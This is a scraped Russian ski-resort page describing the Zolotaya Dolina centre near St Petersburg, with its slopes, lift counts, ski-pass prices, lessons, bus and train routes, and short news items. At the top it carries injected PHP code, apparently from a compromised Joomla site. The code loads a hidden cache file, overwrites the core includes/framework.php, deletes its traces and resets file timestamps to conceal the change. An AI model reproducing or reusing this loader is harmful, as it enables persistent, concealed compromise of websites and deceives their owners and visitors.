$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Горнолыжный центр Золотая Долина | горнолыжки
Баннер

Горнолыжный центр Золотая Долина

Описание

Обсудить на форуме...

[Нажмите для увеличения]

Горнолыжный центр Золотая Долина - Один из старейших курортов недалеко от Санкт-Петербурга, он был открыта 12 лет назад. Расположен возле деревни Коробицыно, где можно найти два других популярных горнолыжных курорта: Красное озеро и Снежный. Все вместе они обеспечивают более 15 км трасс, которые являются относительно короткими и легкими. Если вам нравится фристайл: есть сноуборд-парк, бигэир и хафпайл. Курорт является довольно популярным среди местных сноубордистов. Кроме того, можно посмотреть красоты Санкт-Петербурга, если вы хотите погулять по городу. Есть гостиница и несколько ресторанов, которые вполне доступны по цене.

Фрирайд: Склоны не слишком длинный и не слишком крутой, поэтому оно может быть довольно скучной для большинства фрирайдеров

Фристайл: фристайлерам есть где развернуться. Золотая долина имеет хороший 100-метровый Half Pipe, Big Air и сноуборд-парк со всевозможными препятствиями, которые смогут вас занять на долгое время.

Карвинг: скоростные спуски довольно короткие, но ухоженные. Иногда здесь проходят соревнования по скоростному спуску.

Для начинающих: очень хорошее место для начинающих, все спуски хорошо подготовлены и есть много достаточно пологих склонов.

Подъёмники

Всего : 5
Бугель: 5
Макс. человек в час: 3500

Склон

Всего трасс: 12
Общая площадь езды: 5 км
Самая длинная трасса: 0,8 км

Максимальная длинна подъёмника: 105м
Перепад высот: 105м

Сложность

Зеленые трассы: 65%
Красные трассы: 25%
Черные трассы: 10%

Ski-Pass

День катания: 800р ($ 30) (пн-пт), 1000р ($ 37) (суб. и воскр)
1 час: 220р ($ 8) (пн-пт), 300р ($ 11) (суббота и воскресенье)
4 часа: 500р ($ 18) (пн-пт), 700р ($ 25)
(суб. и воскр)

Время работы: с 12 до 21 (пн-пт), с 10 до 22 (сб), с  9 до 21 (вос.)

Обучение

Сноуборд-инструктор: Да, 1, 600р ($ 22) в час (частные уроки)
Сноуборд школа: Да, 450р ($ 16) в день
Освещение склонов: до 10 вечера

Как добираться

самолётом

Самолет в Санкт-Петербург прибывают в аэропорт Пулково, который довольно далеко от курорта. Вам нужно будет проехать по городу в сторону Выборга.

на автобусе

ежедневно ходит автобус №678 от станции "Озерки" в 9, 11, 14:30, 16:30, 19:20, 21. Время в пути около 1 часа 50 минут до Коробицыно . Автобус от Коробицыно до Красного озера отходит в 6:30, 7:20, 11:40, 13:40, 17:10, 19:00, 21:40, занимает около 1 часа 50 минут, недалеко находится  поселок золотая долина

на поезде

поездов идущих непосредственно до курорта нет но вы можете доехать на электричке от станции Выборгская до станции Первомайское или Сосново, затем на такси ли местном автобусе до курорта.

Контакты

www.zoldol.spb.ru

Коментарии:

 
.

Последние новости

Популярные статьи

Новости
Открытие сезона на ГЛЦ "Царевщина"

Ну вот и дождались любители горных лыж и сноуборда открытия ГЛЦ "Царевщина". Сегодня был полноценный рабочий день на этом комплексе. Снегу накидали достаточно, земли нигде не видно. В некоторых местах есть лёд. Народу немного, на подъёмнике очередей нет. Цены остались на уровне прошлого сезона: 1 смена с 10 до 15 - 600р, 2 смена с 13 до 17 - 700р, 3 смена с 17 до 21 - 300р (в выходные дни). В будние дни соответственно 250 - 300 - 200руб. Работает как всегда только центральная трасса.

 
Новости ГЛК Красная глинка

По заявлениям представителей ГЛК  Красная Глинка, что неподалёку от Самары, открытие намечено не 2 декабря, в настоящее время активно идёт подготовка склонов. На Юге убрали не работающий подъемник, трасса стала шире. Сейчас снежат Восточный склон. К открытию скорее всего будут работать Центр, Восток и если успеют то и Юг.

 
Появился новый раздел "Народный магазин"
Подробнее ...
Горнолыжный центр Золотая Долина | горнолыжки

Как доехать на машине
*От:
*До:
Дай +1 :)
Сохранить в моб...
Яндекс.Метрика